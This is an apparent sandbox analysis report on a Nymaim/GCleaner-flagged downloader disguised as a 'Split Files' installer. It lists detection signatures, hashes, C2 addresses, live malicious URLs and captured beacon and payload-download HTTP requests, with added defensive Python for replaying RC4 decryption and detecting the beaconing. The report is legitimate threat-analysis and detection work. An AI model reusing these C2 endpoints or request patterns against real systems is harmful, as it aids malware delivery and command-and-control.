Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 778239
MD5: 4206f8b371294f11b01592acc7bb338d
SHA1: 9383a82b185715c4b42b23ef730acb53f17dfcfb
SHA256: 5f5252d8963550284ca23188a6ee8a5b9aa85c3d1ce1f5983ee7dcc7e60f8b33
Tags: exe

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: http://171.22.30.106/library.php URL Reputation: Label: malware
Source: http://107.182.129.235/storage/extension.php8 Avira URL Cloud: Label: malware
Source: http://107.182.129.235/storage/extension.php8 Virustotal: Detection: 13%
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe ReversingLabs: Detection: 50%
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Joe Sandbox ML: detected
Source: 2.2.SplitFiles131.exe.10000000.5.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.0.file.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.2.file.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 2.2.SplitFiles131.exe.400000.1.raw.unpack Malware Configuration Extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167"]}
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_10001000 ISCryptGetVersion, 1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_10001130 ArcFourCrypt, 1_2_10001130
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy, 2_2_00403770
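The function at 2_2_00403770 is the classic CryptoAPI decryption chain: a password or seed goes through CryptCreateHash/CryptHashData, CryptDeriveKey turns the finished hash into a session key, and CryptDecrypt uses that key on an embedded blob (the "Uses Microsoft's Enhanced Cryptographic Provider" signature). To replay that offline, an analyst needs CryptDeriveKey's key-derivation rule. The Python below is an added example, not code from the report or from the sample: it implements the derivation as documented by Microsoft and pairs it with RC4 so a blob can be decrypted outside Windows. The hash algorithm (MD5), cipher (CALG_RC4), key length (16 bytes) and the secret/blob are assumptions for illustration; the report does not show the ALG_IDs passed to CryptCreateHash and CryptDeriveKey, so those must be read from the call arguments in a debugger or decompiler before this is applied to the real sample.

```python
"""Offline CryptDeriveKey + RC4 so a CryptHashData -> CryptDeriveKey -> CryptDecrypt chain can be replayed.

Added example; hash, cipher, key size and the sample inputs are assumptions, not values from the report.
"""
import hashlib


def capi_derive_key(hash_name: str, secret: bytes, key_len: int) -> bytes:
    """CryptDeriveKey as documented by Microsoft.

    If the finished hash is at least key_len bytes long, the key is its prefix.
    Otherwise the hash is placed in two 64-byte buffers filled with 0x36 and 0x5C
    (equivalently: zero-padded to 64 bytes and XORed), each buffer is hashed again
    with the same algorithm, and the two digests are concatenated and truncated.
    """
    h = hashlib.new(hash_name, secret).digest()
    if len(h) >= key_len:
        return h[:key_len]
    padded = h.ljust(64, b"\x00")
    buf1 = bytes(b ^ 0x36 for b in padded)
    buf2 = bytes(b ^ 0x5C for b in padded)
    expanded = hashlib.new(hash_name, buf1).digest() + hashlib.new(hash_name, buf2).digest()
    return expanded[:key_len]


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (CALG_RC4). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:                            # pseudo-random generation + XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt_blob(secret: bytes, blob: bytes, hash_name: str = "md5", key_len: int = 16) -> bytes:
    """Equivalent of CryptHashData(secret) -> CryptDeriveKey -> CryptDecrypt for an RC4 session key.

    MD5 + 128-bit RC4 is the assumed configuration; the Enhanced provider allows 128-bit RC4,
    and MD5's 16-byte digest feeds the key directly without the 0x36/0x5C expansion.
    """
    return rc4(capi_derive_key(hash_name, secret, key_len), blob)


# Constructed demo inputs (not recovered from the sample): encrypt once, then decrypt.
SECRET = b"constructed-secret"
PLAINTEXT = b"http://127.0.0.1/constructed-config"
BLOB = rc4(capi_derive_key("md5", SECRET, 16), PLAINTEXT)

if __name__ == "__main__":
    print("derived key:", capi_derive_key("md5", SECRET, 16).hex())
    print("decrypted  :", decrypt_blob(SECRET, BLOB))
```

The expansion path (second branch of capi_derive_key) only matters when the requested key is longer than the digest, for example a 32-byte AES-256 key derived from SHA-1; for MD5 with RC4-128 the key is simply the digest, which is why such loaders are often trivially replayable once the hashed secret is known.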

Compliance

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Unpacked PE file: 2.2.SplitFiles131.exe.400000.1.unpack
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose, 1_2_0046CA68
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00474A14
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045157C FindFirstFileA,GetLastError, 1_2_0045157C
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045E244
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0048AC5C FindFirstFileA,6D7169D0,FindNextFileA,FindClose, 1_2_0048AC5C
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00472CD4
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose, 1_2_0045CDA4
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045DEB0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, 2_2_00404490
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00423E2D FindFirstFileExW, 2_2_00423E2D
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_1000959D FindFirstFileExW, 2_2_1000959D
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp

Networking

Source: Traffic Snort IDS: 2041920 ET TROJAN GCleaner Downloader Activity M8 192.168.2.4:49696 -> 45.139.105.171:80
Source: Traffic Snort IDS: 2852980 ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET) 192.168.2.4:49697 -> 107.182.129.235:80
Source: Traffic Snort IDS: 2852981 ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET) 192.168.2.4:49697 -> 107.182.129.235:80
Source: Traffic Snort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 107.182.129.235:80 -> 192.168.2.4:49697
Source: Malware configuration extractor IPs: 45.139.105.1
Source: Malware configuration extractor IPs: 85.31.46.167
Source: Joe Sandbox View ASN Name: CMCSUS
Source: Joe Sandbox View IP Address: 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.105.171 (reported 4 times)
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235 (reported 46 times)
Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.182.129.235/storage/extension.php
Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.182.129.235/storage/extension.php8
Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.182.129.235/storage/ping.php
Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.182.129.235ibrary.php
Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://171.22.30.106/library.php
Source: is-EPSRP.tmp, 00000001.00000002.377627228.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.378622763.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-MR54O.tmp.1.dr, is-IRLOP.tmp.1.dr String found in binary or memory: http://rus.altarsoft.com/split_files.shtml
Source: is-EPSRP.tmp, 00000001.00000002.377627228.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.378622763.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-2KTR4.tmp.1.dr, is-KJUD7.tmp.1.dr, is-8T8VP.tmp.1.dr, is-L90L4.tmp.1.dr, is-JPC2L.tmp.1.dr, is-4QNQO.tmp.1.dr, is-DPLT0.tmp.1.dr, is-2C8S0.tmp.1.dr, is-BOL01.tmp.1.dr, is-T2GFQ.tmp.1.dr String found in binary or memory: http://www.altarsoft.com/split_files.shtml
Source: file.exe String found in binary or memory: http://www.innosetup.com
Source: is-EPSRP.tmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.dr String found in binary or memory: http://www.innosetup.com/
Source: file.exe, 00000000.00000003.296513260.00000000023A9000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296720525.000000000218D000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.377767344.00000000004C4000.00000002.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.dr String found in binary or memory: http://www.innosetup.comDVarFileInfo$
Source: file.exe, 00000000.00000003.296613859.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296406319.0000000002300000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.dr String found in binary or memory: http://www.remobjects.com/?ps
Source: file.exe, 00000000.00000003.296613859.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296406319.0000000002300000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.dr String found in binary or memory: http://www.remobjects.com/?psU
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar, 2_2_00401B30
Source: global traffic HTTP traffic detected:
    GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: 1
    Host: 45.139.105.171
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /storage/ping.php HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: 0
    Host: 107.182.129.235
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /storage/extension.php HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: 1
    Host: 107.182.129.235
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected (identical request reported 11 times):
    GET /library.php HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: 2
    Host: 171.22.30.106
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: rf6CwnLa.exe, 00000003.00000002.312986657.0000000001750000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
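The captured requests share three traits that a detection engineer can key on regardless of whether the traffic is attributed to Nymaim (the configuration extractor's label) or to GCleaner/Fabookie (the Snort signatures that actually fired): every Host header is a bare IPv4 literal that never appeared in a DNS answer, the User-Agent is a single digit ("0", "1", "2"), and the paths are the same few PHP endpoints. Note also that the extracted C2 address 45.139.105.1 is not the address the sample contacted (45.139.105.171); both belong on the IOC list. The Python below is an added example, not part of the Joe Sandbox report: the request records and the empty DNS-answer set are constructed to mirror the captures above, while the path list and C2 set are copied from the report.

```python
"""Flag the HTTP beaconing pattern seen in this report over constructed proxy-style request records.

Added example, not code from the report. Sample requests are constructed to mirror the captures.
"""
import ipaddress
import re
from dataclasses import dataclass, field

# C2 addresses exactly as printed by the report's malware configuration extractor
CONFIG_C2 = {"45.139.105.1", "85.31.46.167"}

# Request paths observed in the report's captured traffic
SUSPICIOUS_PATHS = {
    "/library.php",
    "/storage/ping.php",
    "/storage/extension.php",
    "/itsnotmalware/count.php",
}

# A User-Agent that is only a short number is not any real client
NUMERIC_UA = re.compile(r"^\d{1,3}$")


@dataclass
class Finding:
    host: str
    path: str
    reasons: list = field(default_factory=list)


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request (CRLF or LF separated) into method, path and a lowercase header map."""
    lines = raw.replace("\r\n", "\n").strip().split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": target.split("?", 1)[0], "headers": headers}


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def analyse(raw_requests, resolved_ips):
    """Return one Finding per request that matches at least one indicator.

    resolved_ips: IPs that appeared as DNS answers in the same capture. A bare-IP Host
    that never came back from DNS mirrors the sandbox signature
    'TCP traffic detected without corresponding DNS query'.
    """
    findings = []
    for raw in raw_requests:
        req = parse_request(raw)
        host = req["headers"].get("host", "")
        reasons = []
        if is_ip_literal(host) and host not in resolved_ips:
            reasons.append("direct-to-ip host without dns")
        if NUMERIC_UA.match(req["headers"].get("user-agent", "")):
            reasons.append("numeric user-agent")
        if req["path"] in SUSPICIOUS_PATHS:
            reasons.append("known downloader path")
        if host in CONFIG_C2:
            reasons.append("host in extracted c2 config")
        if reasons:
            findings.append(Finding(host, req["path"], reasons))
    return findings


def iocs(findings):
    """Distinct contacted hosts, sorted, for hand-off to blocklists."""
    return sorted({f.host for f in findings})


# Constructed sample records: three modelled on the report's captures, one benign control.
SAMPLE_REQUESTS = [
    "GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1\r\n"
    "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nUser-Agent: 1\r\nHost: 45.139.105.171\r\n"
    "Connection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
    "GET /storage/ping.php HTTP/1.1\r\nUser-Agent: 0\r\nHost: 107.182.129.235\r\n\r\n",
    "GET /library.php HTTP/1.1\r\nUser-Agent: 2\r\nHost: 171.22.30.106\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nUser-Agent: Mozilla/5.0\r\nHost: www.example.com\r\n\r\n",
]
SAMPLE_RESOLVED = set()  # constructed: no DNS answers in the capture, as in the report

if __name__ == "__main__":
    results = analyse(SAMPLE_REQUESTS, SAMPLE_RESOLVED)
    for f in results:
        print(f.host, f.path, "->", ", ".join(f.reasons))
    print("IOCs:", iocs(results))
```

The numeric User-Agent and direct-to-IP checks are the durable part; the path list and C2 set will rotate between campaigns and should be treated as enrichment rather than the primary trigger.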

E-Banking Fraud

Source: Yara match File source: 2.2.SplitFiles131.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SplitFiles131.exe.3210000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SplitFiles131.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SplitFiles131.exe.3210000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.376873365.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.376708257.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.375917003.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408280 0_2_00408280
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00468C28 1_2_00468C28
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00461280 1_2_00461280
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0043DE40 1_2_0043DE40
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004302D0 1_2_004302D0
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004445B8 1_2_004445B8
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00434864 1_2_00434864
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0047AA90 1_2_0047AA90
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00444B60 1_2_00444B60
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045ADE0 1_2_0045ADE0
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00480F94 1_2_00480F94
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00445258 1_2_00445258
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004132E1 1_2_004132E1
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00463288 1_2_00463288
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00435568 1_2_00435568
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00445664 1_2_00445664
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0042F874 1_2_0042F874
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00457F04 1_2_00457F04
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00404490 2_2_00404490
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_004096F0 2_2_004096F0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_004056A0 2_2_004056A0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00406800 2_2_00406800
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00406AA0 2_2_00406AA0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00404D40 2_2_00404D40
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00405F40 2_2_00405F40
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00402F20 2_2_00402F20
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_004150D3 2_2_004150D3
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00415305 2_2_00415305
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_004223A9 2_2_004223A9
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00419510 2_2_00419510
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00404840 2_2_00404840
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00426850 2_2_00426850
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00410A50 2_2_00410A50
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0042AB9A 2_2_0042AB9A
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00421C88 2_2_00421C88
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0042ACBA 2_2_0042ACBA
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00447D2D 2_2_00447D2D
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00428D39 2_2_00428D39
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00404F20 2_2_00404F20
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_1000F670 2_2_1000F670
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_1000EC61 2_2_1000EC61
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: String function: 10003C50 appears 34 times
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: String function: 0040F9E0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 004035DC appears 90 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00408CA0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00403548 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00446194 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00445EC4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 004037CC appears 193 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 0043477C appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00455D54 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00407988 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00455B64 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00451DE8 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00405A9C appears 92 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00423C4C NtdllDefWindowProc_A, 1_2_00423C4C
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004126A0 NtdllDefWindowProc_A, 1_2_004126A0
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00455514 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 1_2_00455514
Source: is-EPSRP.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-EPSRP.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-EPSRP.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-5V8K4.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-5V8K4.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-5V8K4.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: file.exe, 00000000.00000000.295778835.0000000000417000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename" vs file.exe
Source: file.exe, 00000000.00000003.296513260.00000000023A9000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.296513260.00000000023A9000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe, 00000000.00000003.296720525.000000000218D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.296720525.000000000218D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe Binary or memory string: OriginalFilename" vs file.exe
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Split Files\is-5V8K4.tmp 1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
